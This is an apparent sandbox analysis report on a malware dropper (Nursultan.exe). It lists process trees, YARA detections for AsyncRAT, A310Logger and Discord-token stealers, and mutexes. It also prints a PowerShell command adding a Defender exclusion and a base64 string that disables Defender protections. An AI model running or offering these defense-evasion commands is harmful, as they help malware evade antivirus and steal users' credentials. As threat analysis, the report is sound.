Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 3_2_00007FF848E520F1
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 3_2_00007FF848E5108D
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Code function: 4_2_00007FF848E60A41
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Code function: 5_2_00007FF848E70A21
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF848F430E9
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Code function: 10_2_00007FF848E60A41
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848E9213D
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848EA54D2
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848EA4726
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848E95010
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848E913D3
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 11_2_00007FF848E913B8
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Code function: 12_2_00007FF848E70A21
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 13_2_00007FF848E91719
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 13_2_00007FF848E920F1
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 13_2_00007FF848E91038
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E8B938
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E8B910
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848EC8A40
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E91B64
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E7F048
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E77228
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E83218
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848EC44F0
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848EC4568
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E8B5F9
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E8B72D
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E8A720
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E8B888
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E85818
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849045202
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849040230
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903E25A
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903C281
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849048922
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF8490459B1
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849045CE2
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849033CE4
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84904A3D4
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849039E98
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849046511
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF8490435A0
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849040228
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849040218
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849032255
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849040270
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849040260
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF8490332A8
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849045AAE
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84904A2D4
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903B0FA
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903294D
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903B1B0
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF8490321D1
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF8490401F2
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903831D
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84904C631
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849044E50
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF8490416F1
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903DD12
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903A51F
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903BD22
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849044D8D
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903A5D4
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF8490305F5
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF84903301D
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF849032880
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF8490477F4
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF848E7DFC6
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Code function: 14_2_00007FF8490468D0
Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | Code function: 23_2_00007FF848E912FD
Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Code function: 25_2_00007FF848E90A41
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 26_2_00007FF848E61719
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 26_2_00007FF848E620F1
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 26_2_00007FF848E61038
Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Code function: 28_2_00007FF848E80A21
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 39_2_00007FF848E81719
Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Code function: 39_2_00007FF848E820F1
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 39_2_00007FF848E8103839_2_00007FF848E81038
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeCode function: 46_2_00007FF848E60A4146_2_00007FF848E60A41
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 49_2_00007FF848E50A2149_2_00007FF848E50A21
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 57_2_00007FF848E8171957_2_00007FF848E81719
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 57_2_00007FF848E820F157_2_00007FF848E820F1
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 57_2_00007FF848E8103857_2_00007FF848E81038
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeCode function: 58_2_00007FF848E60A4158_2_00007FF848E60A41
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 59_2_00007FF848E70A2159_2_00007FF848E70A21
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 61_2_00007FF848E922C061_2_00007FF848E922C0
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 61_2_00007FF848E9228861_2_00007FF848E92288
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 61_2_00007FF848E9226861_2_00007FF848E92268
                            Source: Nursultan.exe, 00000000.00000002.2042751313.0000000002891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXBinderOutput.exe4 vs Nursultan.exe
                            Source: Nursultan.exe, 00000000.00000002.2042751313.0000000002891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs Nursultan.exe
                            Source: Nursultan.exe, 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient.exe4 vs Nursultan.exe
                            Source: Nursultan.exe, 00000000.00000002.2042960120.000000001B3AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXBinde vs Nursultan.exe
                            Source: Nursultan.exe, 00000000.00000002.2042960120.000000001B3AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClio vs Nursultan.exe
                            Source: Nursultan.exe, 00000000.00000000.2014515222.0000000000592000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXBinderOutput.exe4 vs Nursultan.exe
                            Source: Nursultan.exe, 00000002.00000002.2065830648.0000000002B71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXBinderOutput.exe4 vs Nursultan.exe
                            Source: Nursultan.exe, 00000002.00000002.2065830648.0000000002B71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameClient.exe. vs Nursultan.exe
                            Source: Nursultan.exe, 00000005.00000002.2097641852.0000000002F67000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameClient.exe. vs Nursultan.exe
                            Source: Nursultan.exe | Binary or memory string: OriginalFilenameXBinderOutput.exe4 vs Nursultan.exe
                            Source: Nursultan.exe.0.dr | Binary or memory string: OriginalFilenameXBinderOutput.exe4 vs Nursultan.exe
                            Source: Nursultan.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 3.0.Microsoft Edge.exe.b80000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
                            Source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
                            Source: 0.2.Nursultan.exe.128b3a60.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
                            Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infostealers
                            Source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Roaming\Microsoft Edge, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attempting to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infostealers
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED | Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
                            Source: Nursultan.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Nursultan.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Nursultan2.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Microsoft Edge.exe.0.dr, JEjSKPz8UTQEy.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: Microsoft Edge.exe.0.dr, 8IQtID4yHRI2I.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: Microsoft Edge.exe.0.dr, 8IQtID4yHRI2I.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, JEjSKPz8UTQEy.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 8IQtID4yHRI2I.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 8IQtID4yHRI2I.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: Microsoft Edge.3.dr, JEjSKPz8UTQEy.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: Microsoft Edge.3.dr, 8IQtID4yHRI2I.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: Microsoft Edge.3.dr, 8IQtID4yHRI2I.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, JEjSKPz8UTQEy.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 8IQtID4yHRI2I.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 8IQtID4yHRI2I.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: Umbral.exe.4.dr, -----.cs | Base64 encoded string: 'GxYxGFfj914SnzOYBn264rnKB6AyXC6Jt6as5JrQt98hoDETJ9yey4B33MYC72CzSPWsj06xeLc5QVEIIIyUReqXubRXAexcnBOf1XEdtbMFj3EY/BiuZXgFSgLOyyWC+YpSwnm1mPa26TgyVewBZzTGL1ptLvft4gWpn56+1Uu27HsZZBPfQBU='
                            Source: Umbral.exe.4.dr, ------.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, -----.cs | Base64 encoded string: 'GxYxGFfj914SnzOYBn264rnKB6AyXC6Jt6as5JrQt98hoDETJ9yey4B33MYC72CzSPWsj06xeLc5QVEIIIyUReqXubRXAexcnBOf1XEdtbMFj3EY/BiuZXgFSgLOyyWC+YpSwnm1mPa26TgyVewBZzTGL1ptLvft4gWpn56+1Uu27HsZZBPfQBU='
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, ------.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, jHz7doq0Y7v0T.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, jHz7doq0Y7v0T.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, ------.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, ------.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Microsoft Edge.exe.0.dr, jHz7doq0Y7v0T.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Microsoft Edge.exe.0.dr, jHz7doq0Y7v0T.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Microsoft Edge.3.dr, jHz7doq0Y7v0T.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Microsoft Edge.3.dr, jHz7doq0Y7v0T.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Umbral.exe.4.dr, ------.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Umbral.exe.4.dr, ------.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, jHz7doq0Y7v0T.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, jHz7doq0Y7v0T.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Insidious.exe.4.dr, Help.cs | Suspicious URL: 'https://api.vimeworld.ru/user/name/'
                            Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@155/49@37/5
                            Source: C:\Users\user\Desktop\Nursultan.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Nursultan.exe.log
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Mutant created: NULL
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Mutant created: \Sessions\1\BaseNamedObjects\2jtzSA1MrJciSCzzf
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4204:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Mutant created: \Sessions\1\BaseNamedObjects\mldMGDUkBlrEAKf6P458
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Mutant created: \Sessions\1\BaseNamedObjects\Ucf4TZlBqXMy4CkJ
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Mutant created: \Sessions\1\BaseNamedObjects\eZRyVVYrnommEpPz1
                            Source: C:\Users\user\Desktop\Nursultan.exe | Mutant created: \Sessions\1\BaseNamedObjects\5ix2vgEtFCxymOsdE
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                            Source: C:\Users\user\Desktop\Nursultan.exe | File created: C:\Users\user\AppData\Local\Temp\Nursultan.exe
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: Nursultan.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Nursultan.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\Nursultan.exe | File read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\Nursultan.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | File read: C:\Windows\System32\drivers\etc\hosts
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB662D000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6619000.00000004.00000800.00020000.00000000.sdmp, IrkMQrRux8ApBLI.14.dr, 1gWUko2HB0x9rEz.14.dr, tmp2875.tmp.dat.11.dr, tmp2945.tmp.dat.11.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: Nursultan.exe | ReversingLabs: Detection: 81%
                            Source: unknown | Process created: C:\Users\user\Desktop\Nursultan.exe "C:\Users\user\Desktop\Nursultan.exe"
                            Source: C:\Users\user\Desktop\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Users\user\Desktop\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe | Process created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
